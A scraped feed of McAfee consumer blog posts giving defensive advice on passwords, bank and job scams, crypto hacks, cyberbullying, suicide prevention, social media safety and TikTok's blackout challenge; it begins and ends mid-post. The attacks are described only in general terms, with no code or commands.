  • It doesn’t use common words like “password” or “qwerty.” You’d be surprised how many people use “password123” or “123456” as a password. A cybercriminal would not. 

What are the most common ways passwords get hacked?

A cybercriminal may use a variety of strategies to access your passwords. Here are some of their most common tactics. 

  • Guesswork: This is why password security requires unique passwords that don’t include personal information. 
  • Buying passwords on the dark web: Search engines don’t index the dark web. A lot of dark web activity isn’t traceable, including the sale of passwords.  
  • Phishing: This is when a hacker sends an email that appears to be from a trusted source to trick the recipient into typing in their password. 
  • Malware: Cybercriminals may infect a device with malicious software that allows them to access personal data, including passwords. 
  • Shoulder surfing: This could happen in a coffee shop or office if you leave sticky notes showing your passwords on your desk. 
  • Spidering: These are bots that search the web looking for personal data. 
  • Brute force attack: A bot systematically tries thousands of passwords hoping to find the correct one. 

How can you keep your online passwords secure?

When it comes to keeping your data secure, password complexity is just the beginning. Here are a few additional tips for keeping your passwords safe. 

Do a password audit

Review the passwords for all of your accounts. Make sure you’re not using any for multiple websites. See if your passwords are guessable. Do they include personal information like birthdays or addresses? If you find passwords that are weak or repeated, change those first. 

Use multi-factor authentication

Set up multi-factor authentication for important accounts, such as with financial institutions. Logging into a website with two-factor authentication requires you to enter a code sent by text or email in addition to a username and password.  

Some accounts require multi-factor authentication with biometric factors for added security, such as a thumbprint or face scan. Using multi-factor authentication with long, complicated passwords can make an account more secure. 

Use a password manager

A password manager like McAfee True Key can help prevent unauthorized access to your online accounts by protecting your passwords with strong encryption. It also comes with a password generator to help you create complex passwords while storing them safely.  

If you have old or weak passwords or use them on multiple sites, a password manager can generate new ones. It’ll then keep track of them and sign you in to apps and websites — with you only having to remember one master password 

See how McAfee True Key makes managing passwords easy and secure

Let McAfee True Key help you defend your personal data. The password management software makes dealing with passwords secure and easy.  

McAfee True Key stores your passwords on your device using the strongest encryption available. Once you use a master password to log into True Key, it’ll auto-fill your passwords for any apps or websites you visit. For added convenience, True Key securely syncs your information across all of your devices so you can access it wherever you need it.  

While McAfee manages your secure passwords, you can continue enjoying the internet the way it was intended — free from hackers.  

The post How Often Should You Change Your Passwords? appeared first on McAfee Blog.

]]>
Steer Clear of the “Pay Yourself Scam” That’s Targeting Online Bank Accounts https://www.mcafee.com/blogs/internet-security/steer-clear-of-the-pay-yourself-scam-thats-targeting-online-bank-accounts/ Fri, 23 Sep 2022 13:18:57 +0000 https://www.mcafee.com/blogs/?p=159326

An old banking scam has a new look. And it’s making the rounds again.  Recently Bank of America alerted its...

The post Steer Clear of the “Pay Yourself Scam” That’s Targeting Online Bank Accounts appeared first on McAfee Blog.

]]>

An old banking scam has a new look. And it’s making the rounds again. 

Recently Bank of America alerted its customers of the “Pay Yourself Scam,” where scammers use phony fraud alerts and trick their victims into giving them access to their online banking accounts. It’s a form of phishing attack, and according to Bank of America it goes something like this: 

  • You receive a text message that looks like a fraud alert from your bank about unusual activity. The text may look something like: “Did you make a purchase of $100.00 at ABC merchant?” 
  • If you respond to the text, you have now engaged the scammer and will receive a call from a number that appears to be from a bank. 
  • They’ll appear to be a representative from a bank and will offer to help stop the alleged fraud by asking you to send money to yourself with an online payment app. 
  • The scammer will ask you for a one-time code you just received from a bank. 
  • If you give them the code, they will use it to enroll their bank account details with an online payment service using your email address or phone number. 
  • The scammer can now receive your money into their account. 

The good news is that you can avoid this attack rather easily. If you receive a text or call about a possible fraud alert, don’t respond. (Scammers can easily “spoof” or fake caller ID information nowadays. So even if it appears that the number looks legitimate, it may not be after all.) Instead, contact your bank directly using the contact information on your debit or credit card. This way, you’ll know you’re speaking with the proper representatives about the matter. 

Other ways you can avoid online banking scams 

Of course, this scam isn’t the only scam making the rounds these days. Whether it’s with some form of phishing attack, stealing passwords on public Wi-Fi, or malware that spies on your keystrokes, scammers use plenty of tricks to crack into online bank accounts. Yet with a few precautions and a sharp eye, you have several ways you can protect yourself. 

Use comprehensive online protection software 

Online protection software today goes far beyond antivirus. It can protect your privacy, identity, and your online accounts as well. McAfee+ Ultimate provides our most comprehensive coverage with features that monitor the dark web and sketchy data broker sites for your personal information, identity theft and ransomware protection, and identity restoration services should the unexpected happen—all along with our award-winning antivirus protection. In all, it protects you, not just your devices. Together, it offers your strongest line of defense in the face of hackers, scammers, and thieves. 

Scrutinize any messages claiming to be your bank 

Legitimate banks will never pressure, harass, or cajole you into action. If you get a message that strikes an aggressive tone, assume it’s fraudulent. Other things legitimate banks will never do include:  

  • Banks or other financial institutions don’t call for your PIN or checking account number. Never provide this over the phone. Call your bank directly using the phone number on your debit or credit card or bank statement if you want to confirm.  
  • Your bank has no reason to email you for account information it already has. If you receive an email asking you to click a link or provide account information, assume it’s fraudulent. Don’t click any links and mark the email as spam.  
  • If a message appears to be from your bank asking you to sign in or enter your PIN, it’s a scam. Banks never ask customers for this information by text.  
  • A common theme in phishing emails is the urgent call to action. Cybercriminals want to scare you into acting immediately without thinking. The email says there was suspicious activity on your account, and you should log in immediately to avoid having it frozen or closed. No legitimate business would close a customer’s account without giving reasonable notice. Contact your bank through your normal channels to check your balance and account activity if you aren’t sure.  
  • Misspelled words and grammatical errors are another red flag. Major corporations have professional editors to make sure the content is correct.  

Use your bank’s official website or app 

Earlier, I mentioned contacting your bank directly to ensure you’re speaking to a proper representative. Another way you can go directly to the source is to use your bank’s website or app to check up on your accounts. Once again, don’t click any links in a text or email. Just go to your bank’s website or app to check your account. You can make sure you have your bank’s official app by visiting the Google Play or Apple’s App Store and looking at the information section to ensure that it was indeed developed by your bank—not a copycat. 

Use strong, passwords and a password manager to stay on top of them all 

Strong and unique passwords for each of your online accounts can help keep hackers at bay. With data breaches occurring so often, updating them regularly is important too. Yet with all the accounts we keep, that can mean a lot of work. However, a password manager can create those passwords for you and safely store them as well. Comprehensive security software will include one. 

Use two-factor authentication on your accounts  

Two-factor authentication is an extra layer of defense on top of your username and password. It adds in the use of a special one-time-use code to access your account, usually sent to you via email or to your phone by text or a phone call. In all, it combines something you know, like your password, with something you have, like your smartphone. Together, that makes it tougher for a crook to hack your account. If any of your accounts support two-factor authentication, the few extra seconds it takes to set up is more than worth the big boost in protection you’ll get.  

Don’t access your online banking account via public Wi-Fi 

When you log onto public Wi-Fi, potentially anyone can see your internet activity—and that includes things like entering your username and password. For that reason, only log into your bank account with public Wi-Fi if you’re using a virtual private network (VPN).  McAfee Secure VPN protects your privacy by turning on automatically for unsecured networks. Your data is encrypted so it can’t be read by prying eyes. The VPN also keeps your online activity and physical location private and secure from advertisers.  

Check your bank statements regularly 

Keeping an eye on your bills and statements as they come in can help you spot unusual activity on your accounts. A credit monitoring service can do that one better by keeping daily tabs on changes to your credit report. While you can do this manually, there are limitations. First, it involves logging into each bureau and doing some digging of your own. Second, there are limitations as to how many free credit reports you can pull each year. A service does that for you and without impacting your credit score. 

Depending on your location and plan, McAfee’s credit monitoring allows you to look after your credit score and the accounts within it to see fluctuations and help you identify unusual activity, all in one place, checking daily for signs of identity theft. 

Prevention and vigilance are your best defense from online banking scams  

When a fraud notification pops up on your phone, you can almost feel your stomach drop. Hackers and scammers play off that fear. They use it to get you to act—and to act quickly. Taking a moment to scrutinize these messages and following up directly with your bank can help you steer clear of their tricks. Likewise, putting up a strong defense with comprehensive online protection software can make you safer still. In the meantime, keep your eyes open for this “Pay Yourself Scam” and other scams like it. It’s certainly not the first of its kind, and it won’t be the last. 

The post Steer Clear of the “Pay Yourself Scam” That’s Targeting Online Bank Accounts appeared first on McAfee Blog.

]]>
Cryptohacking: Is Cryptocurrency Losing Its Credibility? https://www.mcafee.com/blogs/internet-security/cryptohacking-is-cryptocurrency-losing-its-credibility/ Tue, 20 Sep 2022 17:05:17 +0000 https://www.mcafee.com/blogs/?p=159511

In the fall of 2021, cryptocurrency value skyrocketed. Ethereum and Bitcoin had their highest values ever, causing a huge stir...

The post Cryptohacking: Is Cryptocurrency Losing Its Credibility? appeared first on McAfee Blog.

]]>

In the fall of 2021, cryptocurrency value skyrocketed. Ethereum and Bitcoin had their highest values ever, causing a huge stir in interest in online currencies from experts, hobbyists and newbies alike … and in cybercriminals seeking huge paydays. Since then, cryptocurrency value has cooled, as has the public’s opinion about whether it’s worth the risk. Huge cryptohacking events dominate the headlines, leaving us to wonder: Is cryptocurrency losing its credibility? 

In this article, you’ll learn about recent unfortunate crypto hacks and a few cryptocurrency security tips to help you avoid a similar misfortune. 

Secure Your Crypto Wallet 

A crypto wallet is the software or the physical device that stores the public and private keys to your cryptocurrency. A public key is the string of letters and numbers that people swap with each other in crypto transactions. It’s ok to share a public key with someone you trust. Your private key, however, must remain private — think of it like the password that secures your online bank account. Just like your actual wallet, if it falls into the wrong hands, you can lose a lot of money.   

What happened in the Mars Stealer malware attack on crypto wallets? 

A malware called Mars Stealer infiltrated several crypto wallet browser extensions, including the popular MetaMask. The malware stole private keys and then erased its tracks to mask that it had ever gained entry to the wallet.1 

How can you ensure a secure wallet?  

One way to completely avoid a breach to your software crypto wallet is to opt for a hardware wallet. A hardware wallet is a physical device that can only be opened with a PIN. But there is some risk involved with a hardware wallet: if you drop it down the drain, all your crypto is gone. If you forget your wallet PIN, there is no customer service chatbot that can help you remember it. You are solely responsible for keeping track of it. For those who are confident in their hardware’s hiding spot and their personal organizational skills, they can benefit from its added security. 

For anyone less sure of their ability to keep track of a hardware wallet, a software wallet is a fine alternative, though always been on alert of software wallet hacks. Keep an eye on crypto news and be ready to secure your software at a moment’s notice. Measures include un-downloading browser extensions, changing passwords, or transferring your crypto assets to another software wallet. 

In the case of the Mars Stealer malware that affected MetaMask, being careful about visiting secure sites and only clicking on trustworthy links could’ve helped prevent it. Mars Stealer made its way onto people’s devices after they clicked on an infected link or visited a risky website. Stick to websites you know you can trust and consider springing for well-known streaming services and paying for software instead of torrenting from free sources. 

Only Trust Secure Bridges and Be Prepared to Act Quickly

Cryptocurrency enthusiasts often spread their crypto investments across various currency types and blockchain environments. Software known as a bridge can link numerous accounts and types, making it easier to send currency. 

What happened in the Horizon bridge hack?

The cross-chain bridge Horizon experienced was on its Harmony blockchain, where a hacker stole about $100 million in Ethereum and tokens. The hacker stole two private keys, with which they could then validate this huge transaction into their own wallet. To hopefully prevent this from happening in the future, Horizon now requires more than just two validators.2 

How can you avoid crumbling bridges? 

According to one report, in 2022, 69% of all cryptocurrency losses have occurred in bridge attacks.3 If you exchange cryptocurrencies with other users and have various accounts, it’s almost inevitable that you’ll use bridge software. To keep your assets safe, make sure to extensively research any bridge before trusting it. Take a look at their security protocols and how they’ve responded to past breaches, if applicable.  

In the case of Horizon, the stolen private keys were encrypted with a passphrase and with a key management service, which follows best practices. Make sure that you always defend your private keys and all your cryptocurrency-related accounts with multi-factor authentication. Even though it may not 100% protect your assets, it’ll foil a less persistent cybercriminal. 

Phishing attacks on bridge companies in conjunction with software hacks are also common. In this scenario, there’s unfortunately not much you can control. What you can control is how quickly and completely you respond to the cybercrime event. Remove the bridge software from your devices, transfer all your assets to a hardware wallet, and await further instructions from the bridge company on how to proceed. 

Never Trade Security for Convenience

Decentralized finance, or DeFi, is now one of the riskiest aspects of cryptocurrency. DeFi is a system without governing bodies. Some crypto traders like the anonymity and autonomy of being able to make transactions without a bank or institution tracking their assets. The drawback is that the code used in smart contracts isn’t bulletproof and has been at the center of several costly cybercrimes. Smart contracts are agreed upon by crypto buyers and sellers, and they contain code that programs crypto to perform certain financial transactions. 

What happened in recent smart contract hacks? 

Three multi-million-dollar heists – Wormhole, Beanstalk Farms and Ronin bridge – occurred in quick succession, and smart contracts were at the center of each.4 In the case of Wormhole, a cybercriminal minted 120,000 in one currency and then traded them for Ethereum without putting up the necessary collateral. In the end, the hacker cashed out with $320 million. Beanstalk Farms lost $182 million when a hacker discovered a loophole in the stablecoin’s flash loan smart contract. Axie Infinity’s Ronin bridge was hit for $625 million when a hacker took control over and signed five of the nine validator nodes through a smart contract hole.4 

How can you avoid smart contract failures  

To be safe, conduct all crypto transactions on well-known and trustworthy software, applications, bridges, and wallets that are backed by a governing body. What you lose in anonymity you gain in security by way of regulated protocols. Hackers are targeting smart contracts because they do not have to depend on large-scale phishing schemes to get the information they need. Instead, they can infiltrate the code themselves and steal assets from the smartest and most careful crypto users. Because there’s almost no way you can predict the next smart contract hack, the best path forward is to always remain on your toes and be ready to react should one occur. 

Enjoy Cryptocurrency but Keep Your Eyes Peeled

Don’t let these costly hacks be what stops you from exploring crypto! Crypto is great as a side hustle if you’re committed to security and are strategic in your investments. Make sure you follow the best practices outlined and arm all your devices (mobile included!) with top-notch security, such as antivirus software, a VPN, and a password manager, all of which are included in McAfee + 

Privacy, excellent security habits, and an eagle eye can help you enjoy the most out of cryptocurrency and sidestep its costly pitfalls. Now, go forth confidently and prosper in the crypto realm! 

 

1Cointelegraph, “Hodlers, beware! New malware targets MetaMask and 40 other crypto wallets 

2Halborn, “Explained: The Harmony Horizon Bridge Hack 

3Chainalysis, “Vulnerabilities in Cross-chain Bridge Protocols Emerge as Top Security Risk 

4Protocol, “Crypto is crumbling, and DeFi hacks are getting worse 

5Cointelegraph, “Beanstalk Farms loses $182M in DeFi governance exploit 

The post Cryptohacking: Is Cryptocurrency Losing Its Credibility? appeared first on McAfee Blog.

]]>
Watch Out for These 3 Online Job Scams https://www.mcafee.com/blogs/internet-security/watch-out-for-these-3-online-job-scams/ Tue, 20 Sep 2022 09:03:04 +0000 /blogs/?p=123601

If you recently found yourself looking for a new job, you are far from alone. According to the Institute of Labor Economics,...

The post Watch Out for These 3 Online Job Scams appeared first on McAfee Blog.

]]>

If you recently found yourself looking for a new job, you are far from alone. According to the Institute of Labor Economics, more Canadians were seeking new employment opportunities at the height of the pandemic than during the previous three recessions combined. Job hunters only used to have to worry about the clarity of their cover letters and impressing interviewers. Now, however, a new hurdle is in the mix in the race for a new job: online job scams. 

Here are three online job scams that you may encounter, plus a few tips on how to avoid and report them. 

1. Fake Job Ads

Fake job ads trick employment seekers into giving up their financial information. Fake job ads are more likely to appear on free sites, such as Craigslist, but they could be listed anywhere. So, no matter where you are searching, be wary that not everyone is looking for a talented individual such as yourself. They are on the hunt for sensitive personal details. 

When you are interviewing for jobs, legitimate employers are careful and intentioned about evaluating your fit for the job. For this reason, employers want to make sure they are not interviewing fake candidates, so they are likely going to want to meet you face-to-face or through a video chat. If an employer extends a job offer after a few email exchanges or an instant messenger job interview, request a more formal meeting. If they say that they would like to move fast and hire quickly, be concerned as no real employer would act that quickly. 

Guard your personal and financial information until you are 100% sure of the legitimacy of a job offer. Be on high alert if the “human resources representative” asks for your credit card or banking information to pay for training. Fake employers may also ask for your Social Insurance Number before extending a job offer letter. A great rule of thumb is to never share your SIN with anyone over the phone or over email. 

2. Phishing Emails

Between March and September 2020, 34% of Canadian respondents reported receiving a phishing message, according to a survey by Statistics CanadaPhishing emails often include malicious links that, when clicked, download malware to your device. Online job scams may not only attempt to steal your sensitive information, but they may also be phishing attempts to take over your personal devices. 

Some scammers using job offers as a guise might email people who never applied for a new opportunity. Be careful around these types of messages, urges the University of Calgary. Recruiters will most likely reach out and offer unsolicited interviews through social networking channels rather than email. Also, when you receive emails from people looking to hire you, take note of their email domain name. Is the email domain customized to the company’s name or is it a generic @gmail or @yahoo? Check the spelling of the email domain carefully too. Phishers are notoriously bad spellers and sometimes they use incorrect spelling of domain names to trick people into thinking they are the real company. 

3. Immigration Scams

Immigrating anywhere is a massive and stressful undertaking. Cybercriminals prey upon this stressful, major life event and target immigrants with enticing, but fake, job offers. The Government of Canada advises to never trust someone who says they can guarantee you a job in Canada. Also, keep an eye on the salary. Is it very high? Do your skills not completely align with the job description? Does the job seem very easy? Unfortunately, that may mean that the offer is too good to be true.  

How to Cover Your Bases

The best way to avoid falling for job scams is to know what you are looking for and to take your time when considering a new job. Check out these tips to outsmart scammers and keep your personal information and devices safe. 

1. Verify employers

Most job applications are submitted online, but if an employer is impressed by your resume, they will likely offer a screening call. When a human resources representative calls, make sure to note their name and ask for the website address of the company. Afterwards, search for the company online and the human resources representative who called you. They should show up together on a professional-looking website or a professional networking site. 

2. Read carefully

Inspect all correspondences you get from potential employers. Phishers often use language that inspires strong emotions and urges a speedy response. Strong emotions could include excitement or fear. If the email says you only have a few hours to respond or else the job will go to someone else, be skeptical. Accepting a job is a huge decision that you should be able to take at least a few days to think about. Read carefully, always hover over links to see where they redirect, and keep a level head when making decisions about your next career move. 

3. Report fraudulent activity

When you come across fraudulent activity, it is important that you report it to the correct authorities to stop it from happening to someone else. For immigration and online job scams, contact the Canadian Anti-Fraud Centre. 

4. Install security tools 

Phishers and job scammers may have gotten in contact with you with the aim of downloading malicious software on your computer. A comprehensive suite of security tools will protect you from viruses and malware that may have slipped past your eagle eye. McAfee Total Protection offers premium antivirus software, safe web browsing, and PC optimization. 

The post Watch Out for These 3 Online Job Scams appeared first on McAfee Blog.

]]>
What You Do Now To Protect Your Child From Cyberbullying https://www.mcafee.com/blogs/family-safety/what-you-do-now-to-protect-your-child-from-cyberbullying/ Mon, 19 Sep 2022 18:37:57 +0000 https://www.mcafee.com/blogs/?p=159291

I can’t tell you how many times over my 25 years of parenting that I’ve just wanted to wrap my...

The post What You Do Now To Protect Your Child From Cyberbullying appeared first on McAfee Blog.

]]>

I can’t tell you how many times over my 25 years of parenting that I’ve just wanted to wrap my boys in cotton wool and protect them from all the tricky stuff that life can throw our way. But unfortunately, that’s never been an option. Whether it’s been friendship issues in the playground, dramas on a messaging app or dealing with broken hearts, it can be really hard watching your kids experience hardship. 

Get Ahead Of The Problem! 

But one thing I have learnt from years of mothering is that if you spend some time getting ahead of a potentially challenging situation then you’ve got a much better chance of minimising it. Or better still preventing it – and this absolutely applies to cyberbullying. 

Is Cyberbullying A Big Problem for Aussie Kids? 

In early 2022, McAfee interviewed over 15,000 parents and 12,000 children worldwide with the goal of finding out how families both connect and protect themselves online. And what they found was astounding: Aussie kids reported the 2nd highest rate of cyberbullying (24%) out of the 10 countries surveyed. American children reported the highest rate. The average for all countries was 17%. Check out my post here with all the details.  

So, to dig deeper into this issue of cyberbullying, McAfee commissioned additional research in August this year to better understand what cyberbullying looks like, where it happens and who the perpetrators are. And the biggest takeaways for Aussie kids: 

  • Name calling is the most common form of cyberbullying 
  • Most cyberbullying happens on social media 
  • Aussie kids have the highest rate of cyberbullying on Snapchat 
  • 56% of Aussie kids know the perpetrator 

You can check out my post here with all the details.  

How To Avoid Your Kids Becoming a Statistic 

So, if you need to grab a cuppa and digest all this, I don’t blame you! It’s a lot. But, as mentioned before, I honestly believe that if we get ahead of the challenges, we have a greater chance of minimising the fall out. So, without further ado – here is my advice on what you can do NOW to minimise the chance of your kids being involved in cyberbullying – either as the victim or the perpetrator. 

1. Talk About Online Respect and Kindness As Soon As They Start Using Devices 

As soon as your kids move on from just watching movies and playing games on their devices, you need to talk about the importance of ‘being nice’ online. A more natural way around this is to extend your parenting advice to include the online world too. For example:  

  • ‘Remember how important it is to be kind to everyone when you are in the playground at kindy – as well as when you are online.’  
  • ‘Always say please and thank you – to your friends in-person and online too.’ 

And don’t forget the importance of role-modelling this too! 

2. Check Your Family Communication Culture 

One of the best things you can do is to create a family culture where honest and genuine two-way communication is a feature of family life. If your kids know they can confide in you, that nothing is off-limits and that you won’t overreact – then they are more likely to open-up about a problem before it becomes overwhelming and ‘unsolvable’. 

3. Understand Your Child’s World 

Parents who have a comprehensive understanding of their child’s life will be better able to detect when things aren’t going well. Knowing who your kid’s friends are, who they ‘sit with’ at lunchtime, their favourite music and their boyfriend or girlfriend needs to be a big priority. I also encourage parents to establish relationships with teachers or mentors at school so they can keep their ‘ear to the ground’. When a child’s behaviour and interests change, it can often mean that all isn’t well and that some detective work is required! 

4. Ensure Your Kids Understand What Bullying Is 

Cyberbullying can have a variety of definitions which can often cause confusion. In McAfee’s research, they used the definition by StopBullying.Gov: 

Cyberbullying is bullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, Text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else. It can include sharing personal or private information about someone else causing embarrassment or humiliation. Some cyberbullying crosses the line into unlawful or criminal behaviour.  

McAfee’s definition was then expanded to include specific acts of cyberbullying, such as: 

  • flaming – online arguments that can include personal attacks 
  • outing – disclosing someone’s sexual orientation without their consent  
  • trolling – intentionally trying to instigate a conflict through antagonistic messages 
  • doxing – publishing private or identifying information without someone’s consent  

Along with other acts, including:  

  • name calling  
  • spreading false rumours  
  • sending explicit images or messages  
  • cyberstalking, harassment, and physical threats  
  • exclusion from group chats and conversation 

Now, I appreciate that reading your children several minutes of definitions may not be very helpful. So, instead, keep it simple and amend the above to make it age appropriate for your kids. You may choose to say that it is when someone is being mean online, if your kids are very young. But if you have tweens in the house then I think more details would be important. The goal here is for them to understand at what point they shouldn’t accept bad behaviour online.  

5. Give Them An Action Plan For When They Experience Bad Behaviour Online  

As soon as your kids are actively engaged with others online, they need to have an action plan in case things go awry – probably around 6-7 years of age. In fact, I consider this to be a golden time in parenting – a time when your kids are receptive to your advice and often keen to please. So, this is when you need to help them establish good practices and habits that will hold them in good stead. This is what I would instil: 

  • If someone makes you feel upset when you are online, you need to tell a trusted adult 
  • Save a copy of the interaction, perhaps take a screenshot. Ensure they know how to do this. 
  • Block the sender or delete them from your contacts. 
  • Report the behaviour to the school, the police or the eSafety Commissioner’s Office, if necessary 

Now, of course not all bad behaviour online will be defined as cyberbullying – remember we all see the world through different lenses. However, what’s important here is that your kids ask for help when they experience something that makes them feel uncomfortable. And while we all hope that it is unlikely that you will need to escalate any interactions to the police or the eSafety Commissioner, knowing what the course of action is in case things get out of hand is essential.  

6. Make Empathy A Priority  

There is so much research on the connection between the lack of empathy and bullying behaviours. In her book Unselfie, Parenting expert Michelle Borba explains that we are in the midst of an ‘empathy crisis’ which is contributing to bullying behaviour. She believes teens today are far less empathetic than they were 30 years ago. Teaching your kids to ‘walk in someone’s else’s shoes’, consider how others feel and have a focus on compassion will go a long way to developing an empathetic lens. You can read more about helping develop empathy in your child here.  

There is no doubt that cyberbullying is one of the biggest parenting challenges of our generation and, unfortunately, it isn’t going to disappear anytime soon. So, get ahead of the problem – teach your kids about kindness from a young age, create an open family communication culture, make empathy a priority in your family and give them an action plan in case things get tricky online. But most importantly, always listen to your gut. If you think things aren’t right with your kids – if they don’t want to go to school, seem emotional after using their devices or their behaviour suddenly changes, then do some digging. My gut has never let me down!     

Take care 

Alex  

The post What You Do Now To Protect Your Child From Cyberbullying appeared first on McAfee Blog.

]]>
#WSPD Creating hope through action with The Jordan Legacy https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/wspd-creating-hope-through-action-with-the-jordan-legacy/ Mon, 19 Sep 2022 18:09:11 +0000 https://www.mcafee.com/blogs/?p=159231

*TW: Mentions Suicide Our passion for protecting people doesn’t stop with online safety. We deeply care for our people, their...

The post #WSPD Creating hope through action with The Jordan Legacy appeared first on McAfee Blog.

]]>

*TW: Mentions Suicide

Our passion for protecting people doesn’t stop with online safety. We deeply care for our people, their families and friends, and our communities.

To recognize World Suicide Prevention on Sept. 10 and help normalize and encourage conversations about mental health year-round, we recently hosted a discussion with McAfee colleagues and suicide prevention activist and owner of The Jordan Legacy, Steve Phillip. During this session Steve discussed his own personal lived experience of suicide and what he’s learned since establishing The Jordan Legacy when it comes to creating an open and safe environment for all.

Tell us a bit about The Jordan Legacy?

“I established The Jordan Legacy in 2020, following the suicide of my 34-year-old son, Jordan, in December 2019. It’s a registered not-for-profit Community Interest Company (CIC), whose mission is to raise awareness about suicide, open the conversation, help remove the stigma surrounding this topic and importantly, engage with communities and workplaces to discuss and identify practical solutions which will help prevent suicide.”

Why is World Suicide Prevention Day (WSPD) important?

“#WSPD is important in highlighting the biggest killer of men and women under the age of 35. According to the W.H.O, we lose 700,000 people globally to suicide every year – that’s one person every 45 seconds. On average, each suicide will impact 135 other people. This means that more than 95 million people are impacted by suicide annually! And while #WSPD is an important day to highlight, it’s fundamental that we recognize that suicide awareness needs to happen 365 days a year.”

Why are there stigmas surrounding mental health and suicide?

“There are several reasons why stigmas surrounding mental health and suicide exist. Generally, it’s due to a lack of understanding and people making assumptions – such as those with a mental health illness could be dangerous, unreliable or unemployable. Cultural backgrounds also play a part in creating stigma – certain cultures see mental illness and suicide as a taboo subject. The language used around mental health and suicide can also create stigma. In the UK, the act of attempting suicide was decriminalized in 1961 and yet the term ‘committed suicide’ is still frequently used, in the same way as commit murder or commit assault.”

How can we open-up a conversation and support someone who might be struggling with their mental health?

“It’s important to ask people how they are with a genuine intent to listen to and understand their reply. Most people who are struggling with their mental health don’t necessarily want you to fix them, but they do want to feel that they’re being listened to. Ask open-ended questions, such as ‘tell me how are you really feeling?’, ‘explain to me how this is impacting on you?’, ‘describe to me, how this is making you feel?”

How can we create hope through action – as family members, friends, and colleagues?

“We need to become a kinder and more compassionate society by recognizing that everyone can, at some point in their lives, struggle with poor mental health. Understanding this, would hopefully cause people to be less frustrated with others who don’t behave as they expect they might. We also need to check-in with family members, friends and colleagues more frequently and ask them ‘how are you really doing?”

How can we look after our own well-being?

“I am one of those individuals who probably works too hard and for too long! However, road cycling is a big escape for me and getting out in the fresh air in the countryside is a huge help. As is my part-time hobby of playing the drums – you can lose a lot of pent-up stress whilst playing along to Nirvana!! It’s so important that you make sure to look after yourself. So, my advice is to find out what works for you – whether that’s going for a walk, talking to a friend, speaking to a counsellor, joining a local group or seeing what resources are available to you through your company’s EAP. And remember most importantly to be kind to yourself.”

If you or someone you know is struggling, please call or text 988 to get support. And remember, you are not alone.

Together we can prevent suicide 💛

The post #WSPD Creating hope through action with The Jordan Legacy appeared first on McAfee Blog.

]]>
Protect Your Social Media Accounts from Hacks and Attacks https://www.mcafee.com/blogs/internet-security/protect-your-social-media-accounts-from-hacks-and-attacks/ Mon, 19 Sep 2022 13:00:17 +0000 /blogs/?p=123823

Here’s to the hashtags, the likes, the followers, the DMs, and the LOLs—June 30th marks Social Media Day, a time to celebrate...

The post Protect Your Social Media Accounts from Hacks and Attacks appeared first on McAfee Blog.

]]>

Here’s to the hashtags, the likes, the followers, the DMs, and the LOLs—June 30th marks Social Media Day, a time to celebrate and reflect on how social media has changed our lives over the years. 

Started in 2010 by media and entertainment company Mashable, celebrations have taken on all kinds of forms. Meetups, contests, calls to increase your social circle by one meaningful connection have all marked the date in the past. Yet this year feels like an opportunity to consider just how heavily so many of us have leaned upon social media these past months, particularly in a world where nearly 50% of the global population are social media users to some degree or other. 

What’s more, people worldwide spend an average of 145 minutes a day on social media. With users in the Philippines spending three hours and 53 minutes a day and users in the U.S. spending just over two hours a day, that figure can vary widely, yet it’s safe to say that a good portion of our day features time browsing around on social media. 

With that, Social Media Day is also a good day to give your social media settings and habits a closer look, all so that you can get the most out of it with less fuss and worry. Whether you’re using Facebook, Instagram, TikTok, or whatnot, here are several things you can do that can help keep you safe and secure out there: 

1. Go private

Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy. 

2. Say “no” to strangers bearing friend requests

Be critical of the invitations you receive. Out-and-out strangers could be more than just a stranger, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q1 of 2021 alone, Facebook took action on 1.3 billion fake accounts. Reject such requests. 

3. Think twice before checking in

Nothing says “there’s nobody at home right now” like that post of you on vacation or sharing your location while you’re out on the town. In effect, such posts announce your whereabouts to a broad audience of followers (even a global audience, if you’re not posting privately, as called out above). Consider sharing photos and stories of your adventures once you’ve returned.  

4. The internet is forever

It’s a famous saying for a reason. Whether your profile is set to private or if you are using an app with “disappearing” messages and posts (like Snapchat), what you post can indeed be saved and shared again. It’s as simple as taking a screenshot. If you don’t want it out there, forever or otherwise, simply don’t post it. 

5. Watch out for phishing scams

We’re increasingly accustomed to the warnings about phishing emails, yet phishing attacks happen plenty on social media. The same rules apply. Don’t follow any links you get from strangers by way of instant or direct messengers. And keep your personal information close. Don’t pass out your email, address, or other info as well. Even those so-called “quiz” posts and websites can be ruses designed to steal bits and pieces of personal info that can be used as the basis of an attack. 

6. Review your tags

Some platforms such as Facebook allow users to review posts that are tagged with their profile names. Check your account settings and give yourself the highest degree of control over how and where your tags are used by others. This will help keep you aware of how you’re being mentioned by others and in what way. 

7. Protect yourself and your devices

Security software can protect you from clicking on malicious links while on social media, strengthen your passwords so your social media account doesn’t get hacked, and boost your online privacy as well. With identity theft a sadly commonplace occurrence today, security software is really a must. 

The post Protect Your Social Media Accounts from Hacks and Attacks appeared first on McAfee Blog.

]]>
Deadly Digital Dares: The Blackout Challenge on TikTok https://www.mcafee.com/blogs/family-safety/deadly-digital-dares-the-blackout-challenge-on-tiktok/ Fri, 16 Sep 2022 16:16:10 +0000 https://www.mcafee.com/blogs/?p=159261

The social network TikTok is chockfull of interesting, fun, laugh-out-loud videos shared by creators worldwide. Kids, as well as parents,...

The post Deadly Digital Dares: The Blackout Challenge on TikTok appeared first on McAfee Blog.

]]>

The social network TikTok is chockfull of interesting, fun, laugh-out-loud videos shared by creators worldwide. Kids, as well as parents, can easily spend hours glued to the platform. But as with most popular platforms, the fun can eventually turn dark, even deadly, when viral challenges make their rounds.  

The latest viral challenge, the “blackout challenge,” first became popular online in 2008 and made its unfortunate comeback in 2021. Before this second round, the CDC attributed nearly 80 deaths to the dangerous online game. In the past month, authorities are attributing the tragic, high-profile deaths of Archie Battersbee, 12, and Leon Brown, 14 to the challenge. 

What is it? 

The blackout challenge is a choking game that involves intentionally trying to choke oneself or another to obtain a brief euphoric state or “high.” Death or serious injury can result if strangulation is prolonged. Those doing the challenge do it privately or broadcast their attempt to friends or followers. The CDC also found that most deaths occurred when a child engaged in the choking game alone and that most parents were unaware of the game before their child’s death.

What’s the appeal? 

